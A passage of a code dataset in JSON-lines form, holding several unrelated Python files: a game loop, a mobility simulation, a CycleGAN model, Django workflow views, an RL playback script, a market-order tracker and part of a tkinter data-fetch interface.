matriz_height):\n for i in range(len(matriz) - 1,-1,-1):\n for j in range(len(matriz[i]) - 1,-1,-1):\n if(matriz[i][j] != None):\n if(tiro.collided(matriz[i][j])):\n if(matriz[i][j] == sp_monster):\n player_life += 1\n aux_explosao = Sprite(\"images/explosion.png\", 14)\n aux_explosao.set_total_duration(1000)\n aux_explosao.set_position(matriz[i][j].x, matriz[i][j].y)\n aux_explosao.set_loop(False)\n explosoes.append(aux_explosao)\n matriz[i][j] = None\n points += 100\n del shoots[k]\n\n #Colisão do tiro sem otimização (FPS ocilando entre 150 e 250)\n # for k,tiro in enumerate(shoots):\n # for i in range(len(matriz)):\n # for j in range(len(matriz[i])):\n # if(matriz[i][j] != None):\n # if(tiro.collided(matriz[i][j])):\n # matriz[i][j] = None\n # del shoots[k]\n\n #Deleta todas as explosões que não estão mais animando\n #Desenha todas que ainda tem animação\n for k,explosao in enumerate(explosoes):\n if not explosao.is_playing():\n del explosoes[k]\n else:\n explosao.draw()\n explosao.update()\n\n player.draw()\n\n janela.update()\n","sub_path":"jogo.py","file_name":"jogo.py","file_ext":"py","file_size_in_byte":12500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 
+{"seq_id":"464201553","text":"# coding: utf-8\n#\n# Copyright (C) 2008-2010 Istituto per l'Interscambio Scientifico I.S.I.\n# You can contact us by email (isi@isi.it) or write to:\n# ISI Foundation, Viale S. Severo 65, 10133 Torino, Italy.\n#\n# This program was written by André Panisson \n#\n\n'''\nCreated on Jan 24, 2012\n\n@author: André Panisson\n@contact: panisson@gmail.com\n@organization: ISI Foundation, Torino, Italy\n'''\nfrom pymobility.models.mobility import gauss_markov, reference_point_group, \\\n tvc, truncated_levy_walk, random_direction, random_waypoint, random_walk\nimport numpy as np\nimport logging\nfrom scipy.spatial.distance import cdist\nimport matplotlib.animation as manimation\nimport sys\n\n\nlogging.basicConfig(format='%(asctime)-15s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(\"simulation\")\n\n# set this to true if you want to plot node positions\nDRAW = True\n\nFPG=20\n\nif DRAW:\n FFMpegWriter = manimation.writers['ffmpeg']\n metadata = dict(title='Movie Test', artist='Matplotlib', comment='Movie support!')\n writer = FFMpegWriter(fps=FPG, metadata=metadata)\n\n\n# number of nodes\nnr_nodes = 100\n\n# simulation area (units)\nMAX_X, MAX_Y = 100, 100\n\n# max and min velocity\nMIN_V, MAX_V = 0.1, 1.\n\n# max waiting time\nMAX_WT = 100.\n\n# number of steps to ignore before start plotting\nSTEPS_TO_IGNORE = 1000\n\n# set this to true if you want to calculate node contacts\nCALCULATE_CONTACTS = False\n# if calculating contacts, this is the range to be used\n# (if a distance(a,b) < RANGE, then there is a contact betwen a and b)\nRANGE = 1.\n\nif DRAW:\n import matplotlib.pyplot as plt\n fig = plt.figure() # plt.ion()\n ax = plt.subplot(111)\n line, = ax.plot(range(MAX_X), range(MAX_X), linestyle='', marker='.')\n\nstep = 0\nnp.random.seed(0xffff)\n\n# UNCOMMENT THE MODEL YOU WANT TO USE\n\n## Random Walk model\n#rw = random_walk(nr_nodes, dimensions=(MAX_X, MAX_Y))\n\n## Truncated Levy Walk model\nrw = tlw = truncated_levy_walk(nr_nodes, dimensions=(MAX_X, MAX_Y))\n\n## Random Direction model\n#rd = random_direction(nr_nodes, dimensions=(MAX_X, MAX_Y))\n\n## Random Waypoint model\n#rwp = random_waypoint(nr_nodes, dimensions=(MAX_X, MAX_Y), velocity=(MIN_V, MAX_V), wt_max=MAX_WT)\n\n## Gauss-Markov model\n#gm = gauss_markov(nr_nodes, dimensions=(MAX_X, MAX_Y), alpha=0.99)\n\n## Reference Point Group model\n#groups = [4 for _ in range(10)]\n#nr_nodes = sum(groups)\n#rpg = reference_point_group(groups, dimensions=(MAX_X, MAX_Y), aggregation=0.5)\n\n## Time-variant Community Mobility Model\n#groups = [4 for _ in range(10)]\n#nr_nodes = sum(groups)\n#tvcm = tvc(groups, dimensions=(MAX_X, MAX_Y), aggregation=[0.5,0.], epoch=[100,100])\n\nwith writer.saving(fig, \"writer_test.mp4\", 100):\n for xy in rw:\n\n step += 1\n if step % 1000 == 0:\n logger.info('Step %s' % step)\n\n\n\n if step >= STEPS_TO_IGNORE and DRAW:\n\n line.set_data(xy[:, 0], xy[:, 1])\n writer.grab_frame()\n plt.draw()\n\n if step == 10*60*FPG + STEPS_TO_IGNORE:\n sys.exit(0)\n","sub_path":"src/pymobility/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"430549626","text":"import torch\nimport itertools\nfrom util.image_pool import ImagePool\nfrom .cycle_gan_model import CycleGANModel\nfrom . 
import networks\nfrom torch.autograd import Variable\nimport numpy as np\nfrom .modules import loss\nfrom util.iter_calculator import IterCalculator\nfrom util.network_group import NetworkGroup\n\nclass CycleGANSemanticModel(CycleGANModel):\n #def name(self):\n # return 'CycleGANModel'\n\n # new, copied from cyclegan model\n @staticmethod\n def modify_commandline_options(parser, is_train=True):\n \"\"\"Add new dataset-specific options, and rewrite default values for existing options.\n\n Parameters:\n parser -- original option parser\n is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.\n\n Returns:\n the modified parser.\n\n For CycleGAN, in addition to GAN losses, we introduce lambda_A, lambda_B, and lambda_identity for the following losses.\n A (source domain), B (target domain).\n Generators: G_A: A -> B; G_B: B -> A.\n Discriminators: D_A: G_A(A) vs. B; D_B: G_B(B) vs. A.\n Forward cycle loss: lambda_A * ||G_B(G_A(A)) - A|| (Eqn. (2) in the paper)\n Backward cycle loss: lambda_B * ||G_A(G_B(B)) - B|| (Eqn. (2) in the paper)\n Identity loss (optional): lambda_identity * (||G_A(B) - B|| * lambda_B + ||G_B(A) - A|| * lambda_A) (Sec 5.2 \"Photo generation from paintings\" in the paper)\n Dropout is not used in the original CycleGAN paper.\n \"\"\"\n parser = CycleGANModel.modify_commandline_options(parser,is_train)\n if is_train:\n parser.add_argument('--train_cls_B', action='store_true', help='if true cls will be trained not only on domain A but also on domain B, if true use_label_B needs to be True')\n parser.add_argument('--cls_template', help='classifier/regressor model type, from torchvision (resnet18, ...), default is custom simple model', default='basic')\n parser.add_argument('--cls_pretrained', action='store_true', help='whether to use a pretrained model, available for non \"basic\" model only')\n parser.add_argument('--lr_f_s', type=float, default=0.0002, help='f_s learning rate')\n parser.add_argument('--regression', action='store_true', help='if true cls will be a regressor and not a classifier')\n parser.add_argument('--lambda_sem', type=float, default=1.0, help='weight for semantic loss')\n parser.add_argument('--lambda_CLS', type=float, default=1.0, help='weight for CLS loss')\n parser.add_argument('--l1_regression', action='store_true', help='if true l1 loss will be used to compute regressor loss')\n \n return parser\n \n def __init__(self, opt):\n super().__init__(opt)\n\n # specify the training losses you want to print out. The program will call base_model.get_current_losses\n if self.opt.iter_size == 1:\n losses_G = ['sem_AB', 'sem_BA']\n losses_CLS = ['CLS'] \n else:\n losses_G = ['sem_AB_avg', 'sem_BA_avg']\n losses_CLS = ['CLS_avg']\n\n self.loss_names_G += losses_G\n self.loss_names_CLS = losses_CLS\n\n self.loss_names = self.loss_names_G + self.loss_names_D + self.loss_names_CLS\n \n # specify the models you want to save to the disk. 
The program will call base_model.save_networks and base_model.load_networks\n if self.isTrain:\n self.model_names += ['CLS']\n \n if self.isTrain:\n self.netCLS = networks.define_C(opt.output_nc, opt.ndf,opt.crop_size,\n init_type=opt.init_type, init_gain=opt.init_gain,\n gpu_ids=self.gpu_ids, nclasses=opt.semantic_nclasses,\n template=opt.cls_template, pretrained=opt.cls_pretrained)\n \n if self.isTrain:\n if opt.regression:\n if opt.l1_regression:\n self.criterionCLS = torch.nn.L1Loss()\n else:\n self.criterionCLS = torch.nn.modules.MSELoss()\n else:\n self.criterionCLS = torch.nn.modules.CrossEntropyLoss()\n \n # initialize optimizers\n self.optimizer_CLS = torch.optim.Adam(self.netCLS.parameters(), lr=opt.lr_f_s, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_CLS)\n\n self.rec_noise = opt.rec_noise\n\n if self.opt.iter_size > 1 :\n self.iter_calculator = IterCalculator(self.loss_names)\n for loss_name in self.loss_names:\n setattr(self, \"loss_\" + loss_name, 0)\n\n ###Making groups\n self.group_CLS = NetworkGroup(networks_to_optimize=[\"CLS\"],forward_functions=None,backward_functions=[\"compute_CLS_loss\"],loss_names_list=[\"loss_names_CLS\"],optimizer=[\"optimizer_CLS\"],loss_backward=[\"loss_CLS\"])\n self.networks_groups.append(self.group_CLS)\n \n def set_input(self, input):\n super().set_input(input)\n if 'A_label' in input:\n if not self.opt.regression:\n self.input_A_label = input['A_label'].to(self.device)\n else:\n self.input_A_label = input['A_label'].to(torch.float).to(device=self.device)\n if 'B_label' in input:\n if not self.opt.regression:\n self.input_B_label = input['B_label'].to(self.device)\n else:\n self.input_B_label = input['B_label'].to(torch.float).to(device=self.device)\n \n \n def forward(self):\n super().forward()\n\n if self.isTrain:\n self.pred_real_A = self.netCLS(self.real_A)\n if not self.opt.regression:\n _,self.gt_pred_A = self.pred_real_A.max(1)\n self.pred_real_B = self.netCLS(self.real_B)\n if not self.opt.regression:\n _,self.gt_pred_B = self.pred_real_B.max(1)\n self.pred_fake_A = self.netCLS(self.fake_A)\n self.pred_fake_B = self.netCLS(self.fake_B)\n\n if not self.opt.regression:\n _,self.pfB = self.pred_fake_B.max(1) #beniz: unused ?\n \n \n def compute_CLS_loss(self):\n label_A = self.input_A_label\n # forward only real source image through semantic classifier\n pred_A = self.netCLS(self.real_A)\n if not self.opt.regression:\n self.loss_CLS = self.opt.lambda_CLS * self.criterionCLS(pred_A, label_A)\n else:\n self.loss_CLS = self.opt.lambda_CLS * self.criterionCLS(pred_A.squeeze(1), label_A)\n if self.opt.train_cls_B:\n label_B = self.input_B_label\n pred_B = self.netCLS(self.real_B)\n if not self.opt.regression:\n self.loss_CLS += self.opt.lambda_CLS * self.criterionCLS(pred_B, label_B)\n else:\n self.loss_CLS += self.opt.lambda_CLS * self.criterionCLS(pred_B.squeeze(1), label_B)\n\n def compute_G_loss(self):\n super().compute_G_loss()\n \n # semantic loss AB\n if not self.opt.regression:\n self.loss_sem_AB = self.criterionCLS(self.pred_fake_B, self.input_A_label)\n else:\n self.loss_sem_AB = self.criterionCLS(self.pred_fake_B.squeeze(1), self.input_A_label)\n \n # semantic loss BA\n if hasattr(self,'input_B_label'):\n if not self.opt.regression:\n self.loss_sem_BA = self.criterionCLS(self.pred_fake_A, self.input_B_label)\n else:\n self.loss_sem_BA = self.criterionCLS(self.pred_fake_A.squeeze(1), self.input_B_label)\n else:\n if not self.opt.regression:\n self.loss_sem_BA = self.criterionCLS(self.pred_fake_A, 
self.gt_pred_B)\n else:\n self.loss_sem_BA = self.criterionCLS(self.pred_fake_A.squeeze(1), self.pred_real_B.squeeze(1))\n \n # only use semantic loss when classifier has reasonably low loss\n #if True:\n if not hasattr(self, 'loss_CLS') or self.loss_CLS.detach().item() > self.opt.semantic_threshold:\n self.loss_sem_AB = 0 * self.loss_sem_AB \n self.loss_sem_BA = 0 * self.loss_sem_BA \n\n self.loss_sem_AB *= self.opt.lambda_sem\n self.loss_sem_BA *= self.opt.lambda_sem\n \n self.loss_G += self.loss_sem_BA + self.loss_sem_AB\n","sub_path":"models/cycle_gan_semantic_model.py","file_name":"cycle_gan_semantic_model.py","file_ext":"py","file_size_in_byte":8555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"298845766","text":"from django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render, get_object_or_404\nfrom hr.models import Workflow_object\nfrom workflows.tools.forms import *\nimport base64\nfrom workflows.models import Workflow,State,Transition,WorkflowPermissionRelation,StatePermissionRelation\nfrom workflows.utils import *\nfrom permissions.utils import register_role,register_permission,has_permission,grant_permission\nfrom permissions.models import Permission,PrincipalRoleRelation\nfrom django.contrib.auth.models import User\nfrom pydot import pydot\n\ndef workflow_add(request):\n if request.method == 'POST':\n form = WorkflowAddForm(request.POST, request.FILES)\n if form.is_valid():\n file = request.FILES['file']\n graph = pydot.graph_from_dot_data(file.read())\n workflow = Workflow.objects.create(name = graph.get_name())\n graph.write_png('mysite/media/'+workflow.name+'.png')\n \n nodes = sorted(graph.get_nodes(),key = lambda node:node.get_id())\n for node in nodes:\n state = State.objects.create(name=node.get_name(), workflow= workflow)\n if not node.get_id():\n #state.status = 'hiden'\n state.save()\n if node.get_root():\n workflow.initial_state = state\n \n for edge in graph.get_edges():\n source_state = State.objects.get(name=edge.get_source(),workflow_id=workflow.id)\n destination_state = State.objects.get(name=edge.get_destination(),workflow_id=workflow.id)\n transition= Transition.objects.create(name=\"Make \"+destination_state.name, workflow=workflow, destination=destination_state)\n source_state.transitions.add(transition)\n \n workflow.save()\n \n view = get_object_or_404(Permission, codename='view')\n edit = get_object_or_404(Permission, codename='edit')\n \n WorkflowPermissionRelation.objects.create(workflow=workflow, permission=view)\n WorkflowPermissionRelation.objects.create(workflow=workflow, permission=edit)\n \n return HttpResponseRedirect(reverse('workflows.tools.views.workflows_list'))\n else:\n form = WorkflowAddForm() # An unbound form\n \n return render_to_response('workflow/workflow_add.html', {\n 'form': form,\n }, context_instance=RequestContext(request))\n \ndef workflow_setpermission(request,workflow_id):\n workflow = get_object_or_404(Workflow, id=workflow_id)\n content = open('mysite/media/'+workflow.name+'.png').read()\n file_data = \"data:image/jpeg;base64,\"+base64.b64encode(content)\n states = State.objects.filter(workflow_id=workflow.id)\n #permissions = Permission.objects.all().order_by('id')\n view = get_object_or_404(Permission, codename='view')\n edit = get_object_or_404(Permission, codename='edit')\n roles = 
Role.objects.all().order_by('id')\n if request.method == 'POST':\n for state in states:\n for role in roles:\n relations = StatePermissionRelation.objects.filter(state_id=state.id, permission_id=view.id, role_id=role.id)\n if relations.count() == 0:\n StatePermissionRelation.objects.create(state=state, permission=view, role=role)\n if request.POST[state.name]:\n selected_role = request.POST[state.name]\n role = get_object_or_404(Role, name=selected_role)\n relations = StatePermissionRelation.objects.filter(state_id=state.id, permission_id=edit.id)\n if relations.count() == 0:\n StatePermissionRelation.objects.create(state=state, permission=edit, role=role)\n else:\n relations.update(role=role)\n \n return HttpResponseRedirect(reverse('workflows.tools.views.workflows_list'))\n \n return render_to_response('workflow/workflow_setpermission.html', {\n 'workflow':workflow,'file_data':file_data,\n 'states':states,'roles':roles\n }, context_instance=RequestContext(request))\n\ndef workflow_object_add(request,workflow_id):\n workflow = get_object_or_404(Workflow, id=workflow_id)\n if request.method == 'POST': # If the form has been submitted...\n #form = WorkflowObjectAddModelForm(request.POST) # A form bound to the POST data\n if request.POST['name']: # All validation rules pass\n workflow_object = Workflow_object.objects.create(name = request.POST['name'])\n set_workflow(workflow_object, workflow)\n \n #grant permission\n roles = Role.objects.all()\n view = get_object_or_404(Permission, codename='view')\n edit = get_object_or_404(Permission, codename='edit')\n for role in roles:\n grant_permission(workflow_object, role, view)\n \n return HttpResponseRedirect(reverse('workflows.tools.views.workflows_list'))\n else:\n form = WorkflowObjectAddForm() # An unbound form\n \n return render_to_response('workflow/workflow_object_add.html', {\n 'form': form,'workflow':workflow,\n }, context_instance=RequestContext(request))\n \ndef workflow_states_list(request,workflow_id,object_id):\n workflow_object = get_object_or_404(Workflow_object, id=int(object_id))\n workflow = get_workflow(workflow_object)\n user = request.user\n #do_transition(),the transition_id from POST\n if has_permission(workflow_object, user, \"edit\"):\n if request.method == 'POST':\n if request.POST['transition_id']:\n transition = get_object_or_404(Transition, id=int(request.POST['transition_id']))\n do_transition(workflow_object,transition,user)\n #state = get_object_or_404(State, id=1)\n #set_state(workflow_object,state)\n \n #return current_state and workflow_states to show in page\n current_state = None\n workflow_states = []\n transitions = []\n states = State.objects.filter(workflow_id=workflow.id).order_by('id')\n if has_permission(workflow_object, user, \"view\"):\n current_state = get_state(workflow_object)\n for state in states:\n #if state.status and 'hiden' in state.status:\n # continue\n #if \"Reject\" not in state.name and \"Failed\" not in state.name and \"Success\" not in state.name:\n workflow_states.append(state)\n \n if has_permission(workflow_object, user, \"edit\"):\n transitions = get_allowed_transitions(workflow_object,user)\n \n content = open('mysite/media/'+workflow.name+'.png').read()\n file_data = \"data:image/jpeg;base64,\"+base64.b64encode(content)\n \n return render_to_response('workflow/states_list.html', {\n 'workflow':workflow,'workflow_states':workflow_states,'transitions':transitions,\n 'current_state':current_state,'object':workflow_object,'file_data':file_data,\n }, 
context_instance=RequestContext(request))\n\ndef workflows_list(request):\n workflows = Workflow.objects.all().order_by('id')\n return render_to_response('workflow/workflows_list.html', {\n 'workflows':workflows,\n }, context_instance=RequestContext(request))\n\ndef workflow_show(request,workflow_id):\n workflow = get_object_or_404(Workflow, id=int(workflow_id))\n \n content = open('mysite/media/'+workflow.name+'.png').read()\n file_data = \"data:image/jpeg;base64,\"+base64.b64encode(content)\n \n workflows = Workflow.objects.all().order_by('id')\n return render_to_response('workflow/workflow_show.html', {\n 'workflow':workflow,'file_data':file_data\n }, context_instance=RequestContext(request))\n\ndef workflow_objects_list(request,workflow_id):\n #workflows = Workflow.objects.all().order_by('id')\n #workflow_objects = Workflow_object.objects.all().order_by('id')\n workflow = get_object_or_404(Workflow, id=workflow_id)\n workflow_objects = workflow.get_objects()\n return render_to_response('workflow/workflow_objects_list.html', {\n 'workflow':workflow,'workflow_objects':workflow_objects\n }, context_instance=RequestContext(request))\n","sub_path":"apps/workflows/tools/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"453408100","text":"import gym\nimport torch\nfrom drl.common.network import mlp_actor_critic\n\nif __name__ == '__main__':\n saved = torch.load('model.pth')\n env = gym.make(saved['env'])\n state_dict = saved['model']\n ac_kwargs = saved['ac_kwargs']\n net = mlp_actor_critic(env.observation_space, env.action_space, **ac_kwargs)\n net.load_state_dict(state_dict)\n net.eval()\n \n obs = env.reset()\n \n while True:\n a, _ = net.actor(obs)\n obs, rew, done, _ = env.step(a.tolist())\n env.render()\n if done:\n obs = env.reset()\n","sub_path":"drl/algo/actor/vpg/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"215941502","text":"import ast\n\n\nclass AkunaMarketOrder:\n def __init__(self):\n self.buy_order = {} # To maintain Buy orders. Eg: {Order_id: Quantity}\n self.sell_order = {} # To maintain Sell orders. Eg: {Order_id: Quantity}\n self.cancel = [] # To maintain list of cancelled order ids\n self.order_mapping = {} # To maintain Order mapping. Eg: {Order_id: Company_Symbol}\n self.position = {} # To maintain marking. 
Eg: {Company_symbol: Marking}\n\n def on_event(self, s):\n dic = (ast.literal_eval(s)) # To convert String JSON to Python Dictionary\n side = ''\n if 'side' in dic: # To check if 'side' key is in input JSON\n side = dic['side']\n type = dic['type']\n if 'symbol' in dic:\n self.order_mapping[dic['order_id']] = dic['symbol']\n if self.order_mapping[dic['order_id']] not in self.position:\n self.position[self.order_mapping[dic['order_id']]] = 0\n if type == 'NEW': # To check if Order type is 'NEW'\n if side == 'BUY': # Check if 'side' is 'BUY'\n self.buy_order[dic['order_id']] = dic['quantity'] # Adds Order_id and Quantity to 'buy_order' Dict\n elif side == 'SELL': # Check if 'side' is 'SELL'\n self.position[dic['symbol']] -= dic['quantity'] # Subtract Sell quantity from the position\n self.sell_order[dic['order_id']] = dic['quantity'] # Add Order_id and Quantity to 'sell_order' Dict\n elif type == 'FILL': # Check if type is 'FILL'\n if dic['remaining_quantity'] == 0: # Check for remaining quantities to be filled\n if dic['order_id'] in self.buy_order:\n self.position[self.order_mapping[dic['order_id']]] += self.buy_order[\n dic['order_id']] # If nothing remaining, update buy position\n del self.buy_order[\n dic['order_id']] # Delete order id from buy_order dict if no remaining quantities\n elif dic['order_id'] in self.sell_order:\n del self.sell_order[\n dic['order_id']] # Delete order id from sell_order dict if no remaining quantities\n else:\n if dic['order_id'] in self.buy_order:\n self.position[self.order_mapping[dic['order_id']]] += dic['filled_quantity']\n self.buy_order[dic['order_id']] = dic[\n 'remaining_quantity'] # Update buy dict with remaining quantities\n elif dic['order_id'] in self.sell_order:\n self.sell_order[dic['order_id']] = dic[\n 'remaining_quantity'] # Update sell dict with remaining quantities\n elif type == 'ORDER_REJECT': # Check if type is 'ORDER_REJECT'\n if dic['order_id'] in self.buy_order: # If order_id in Buy_order dict and is not filled then\n # delete from Buy_order dict\n del self.buy_order[dic['order_id']]\n else:\n # Add to position if order is rejected\n self.position[self.order_mapping[dic['order_id']]] += self.sell_order[dic['order_id']]\n del self.sell_order[dic['order_id']] # Delete from Sell_Order Dict\n elif type == 'CANCEL': # Check if type is 'CANCEL'\n if (dic['order_id'] in self.buy_order) or (dic['order_id'] in self.sell_order): # If order is in Buy_order\n # dict or Sell_order dict Add to cancelled list\n self.cancel.append(dic['order_id'])\n elif type == 'CANCEL_REJECT': # Remove order id from the list if Cancel Reject is passed\n if (dic['order_id']) in self.cancel:\n self.cancel.remove(dic['order_id'])\n elif type == 'CANCEL_ACK': # Check if type is 'CANCEL_ACK'\n if dic['order_id'] in self.cancel: # If Order was cancelled before then add update position\n if dic['order_id'] in self.buy_order:\n del self.buy_order[dic['order_id']] # Since position not updates, just delete from buy_order dict\n else:\n self.position[self.order_mapping[dic['order_id']]] += self.sell_order[\n dic['order_id']] # Update position\n del self.sell_order[dic['order_id']] # Delete from sell_order dict\n return self.position[self.order_mapping[dic['order_id']]]\n\n\ns1 = '{\"type\": \"NEW\", \"symbol\": \"AAPL\", \"order_id\": 1, \"side\": \"BUY\", \"quantity\": 1700, \"time\": \"2017-03-15T10:15:20.178562\"}'\ns21 = '{\"type\": \"ORDER_ACK\", \"order_id\": 1, \"time\": \"2017-03-15T10:15:20.178725\"}'\ns2 = '{\"type\": \"FILL\", \"order_id\": 1, \"filled_quantity\": 
1700, \"remaining_quantity\": 0, \"time\": \"2017-03-15T10:15:20.178839\"}'\ns3 = '{\"type\": \"NEW\", \"symbol\": \"AAPL\", \"order_id\": 2, \"side\": \"SELL\", \"quantity\": 900, \"time\": \"2017-03-15T10:15:20.178956\"}'\ns4 = '{\"type\": \"CANCEL\", \"order_id\": 2, \"time\": \"2017-03-15T10:15:20.179069\"}'\ns5 = '{\"type\": \"ORDER_ACK\", \"order_id\": 2, \"time\": \"2017-03-15T10:15:20.179166\"}'\ns6 = '{\"type\": \"FILL\", \"order_id\": 2, \"filled_quantity\": 900, \"remaining_quantity\": 0, \"time\": \"2017-03-15T10:15:20.179271\"}'\ns7 = '{\"type\": \"CANCEL_REJECT\", \"order_id\": 2, \"reason\": \"ORDER_ID_UNKNOWN\", \"time\": \"2017-03-15T10:15:20.179373\"}'\ns8 = '{\"type\": \"NEW\", \"symbol\": \"MSFT\", \"order_id\": 3, \"side\": \"SELL\", \"quantity\": 1900, \"time\": \"2017-03-15T10:15:20.179572\"}'\ns9 = '{\"type\": \"ORDER_ACK\", \"order_id\": 3, \"time\": \"2017-03-15T10:15:20.179848\"}'\ns10 = '{\"type\": \"CANCEL\", \"order_id\": 3, \"time\": \"2017-03-15T10:15:20.179950\"}'\ns11 = '{\"type\": \"CANCEL_ACK\", \"order_id\": 3, \"time\": \"2017-03-15T10:15:20.180047\"}'\ns12 = '{\"type\": \"NEW\", \"symbol\": \"AAPL\", \"order_id\": 4, \"side\": \"SELL\", \"quantity\": 600, \"time\": \"2017-03-15T10:15:20.180214\"}'\ns13 = '{\"type\": \"ORDER_ACK\", \"order_id\": 4, \"time\": \"2017-03-15T10:15:20.180319\"}'\ns14 = '{\"type\": \"CANCEL\", \"order_id\": 4, \"time\": \"2017-03-15T10:15:20.180406\"}'\ns15 = '{\"type\": \"CANCEL_REJECT\", \"order_id\": 4, \"reason\": \"\", \"time\": \"2017-03-15T10:15:20.180505\"}'\ns16 = '{\"type\": \"NEW\", \"symbol\": \"MSFT\", \"order_id\": 5, \"side\": \"SELL\", \"quantity\": 2000, \"time\": \"2017-03-15T10:15:20.180679\"}'\ns17 = '{\"type\": \"ORDER_REJECT\", \"order_id\": 5, \"reason\": \"FIRM_RISK_LIMIT_EXCEEDED\", \"time\": \"2017-03-15T10:15:20.180825\"}'\ns18 = '{\"type\": \"NEW\", \"symbol\": \"SPY\", \"order_id\": 6, \"side\": \"BUY\", \"quantity\": 200, \"time\": \"2017-03-15T10:15:20.180958\"}'\ns19 = '{\"type\": \"ORDER_ACK\", \"order_id\": 6, \"time\": \"2017-03-15T10:15:20.181062\"}'\ns20 = '{\"type\": \"FILL\", \"order_id\": 6, \"filled_quantity\": 60, \"remaining_quantity\": 140, \"time\": \"2017-03-15T10:15:20.181170\"}'\n\nc = AkunaMarketOrder()\nprint(c.on_event(s1))\nprint(c.on_event(s21))\nprint(c.on_event(s2))\nprint(c.on_event(s3))\nprint(c.on_event(s4))\nprint(c.on_event(s5))\nprint(c.on_event(s6))\nprint(c.on_event(s7))\nprint(c.on_event(s8))\nprint(c.on_event(s9))\nprint(c.on_event(s10))\nprint(c.on_event(s11))\nprint(c.on_event(s12))\nprint(c.on_event(s13))\nprint(c.on_event(s14))\nprint(c.on_event(s15))\nprint(c.on_event(s16))\nprint(c.on_event(s17))\nprint(c.on_event(s18))\nprint(c.on_event(s19))\nprint(c.on_event(s20))\n","sub_path":"AkunaCapital/Sharvil_MarketOrder.py","file_name":"Sharvil_MarketOrder.py","file_ext":"py","file_size_in_byte":7158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"114854447","text":"# fetch_files tab for bfit\n# Derek Fujimoto\n# Nov 2017\n\nfrom tkinter import *\nfrom tkinter import ttk, messagebox, filedialog\nimport numpy as np\nimport pandas as pd\nfrom bdata import bdata\nimport datetime\nfrom functools import partial\nimport matplotlib.pyplot as plt\n\n__doc__=\"\"\"\n To-do:\n scrollbar for lots of runs selected\n \"\"\"\n\n# =========================================================================== #\n# =========================================================================== #\nclass fetch_files(object):\n 
\"\"\"\n Data fields:\n year: StringVar of year to fetch runs from \n run: StringVar input to fetch runs.\n data: dictionary of bdata obj, keyed by run number\n bfit: pointer to parent class\n data_lines: dictionary of dataline obj, keyed by run number\n fet_entry_frame: frame of fetch tab\n check_rebin: IntVar for handling rebin aspect of checkall\n check_bin_remove: StringVar for handing omission of 1F data\n check_state: BooleanVar for handling check all\n \"\"\"\n \n runmode_relabel = {'20':'SLR','1f':'1F','2e':'2e','1n':'Rb Cell Scan'}\n run_number_starter_line = '40001 40005-40010 (run numbers)'\n bin_remove_starter_line = '1 5 100-200 (omit bins)'\n \n # ======================================================================= #\n def __init__(self,fetch_data_tab,bfit):\n \n # initialize\n self.bfit = bfit\n self.data = {}\n self.data_lines = {}\n self.fit_input_tabs = {}\n self.check_rebin = IntVar()\n self.check_bin_remove = StringVar()\n self.check_state = BooleanVar()\n self.fetch_data_tab = fetch_data_tab\n \n # Fetch Tab ---------------------------------------------------------\n fet_entry_frame = ttk.Labelframe(fetch_data_tab,text='Specify Files')\n self.year = StringVar()\n self.run = StringVar()\n \n self.year.set(datetime.datetime.now().year)\n \n entry_year = ttk.Entry(fet_entry_frame,\\\n textvariable=self.year,width=5)\n entry_run = ttk.Entry(fet_entry_frame,\\\n textvariable=self.run,width=60)\n entry_run.insert(0,self.run_number_starter_line)\n entry_fn = partial(on_entry_click,text=self.run_number_starter_line,\\\n entry=entry_run)\n on_focusout_fn = partial(on_focusout,text=self.run_number_starter_line,\\\n entry=entry_run)\n entry_run.bind('', entry_fn)\n entry_run.bind('', on_focusout_fn)\n entry_run.config(foreground='grey')\n \n # fetch and clear button\n fetch = ttk.Button(fet_entry_frame,text='Fetch',command=self.get_data)\n \n # grid and labels\n fet_entry_frame.grid(column=0,row=0,sticky=(N,E))\n ttk.Label(fet_entry_frame,text=\"Year:\").grid(column=0,row=0,\\\n sticky=(E))\n entry_year.grid(column=1,row=0,sticky=(E))\n ttk.Label(fet_entry_frame,text=\"Run Number:\").grid(column=2,row=0,\\\n sticky=(E))\n entry_run.grid(column=3,row=0,sticky=(E))\n fetch.grid(column=4,row=0,sticky=(E))\n \n # padding \n for child in fet_entry_frame.winfo_children(): \n child.grid_configure(padx=5, pady=5)\n \n # detected run mode label \n runmode_label_frame = ttk.Labelframe(fetch_data_tab,pad=(10,5,10,5),\\\n text='Run Mode',)\n \n self.runmode_label = ttk.Label(runmode_label_frame,text=\"\",font='bold',justify=CENTER)\n \n # bigright frame : hold everything on the right\n bigright_frame = ttk.Frame(fetch_data_tab,pad=5)\n \n # rightframe\n right_frame = ttk.Labelframe(bigright_frame,\\\n text='Operations on Checked Items',pad=5)\n \n check_remove = ttk.Button(right_frame,text='Remove',\\\n command=self.remove_all,pad=5)\n check_draw = ttk.Button(right_frame,text='Draw',\\\n command=self.draw_all,pad=5)\n \n check_set = ttk.Button(right_frame,text='Set',\\\n command=self.set_all)\n check_rebin_label = ttk.Label(right_frame,text=\"SLR Rebin:\",pad=5)\n check_rebin_box = Spinbox(right_frame,from_=1,to=100,width=3,\\\n textvariable=self.check_rebin)\n check_bin_remove_entry = ttk.Entry(right_frame,\\\n textvariable=self.check_bin_remove,width=20)\n check_all_box = ttk.Checkbutton(right_frame,text='Check all',\\\n variable=self.check_state,onvalue=True,offvalue=False,pad=5,\\\n command=self.check_all)\n self.check_state.set(False)\n \n # add grey to check_bin_remove_entry\n 
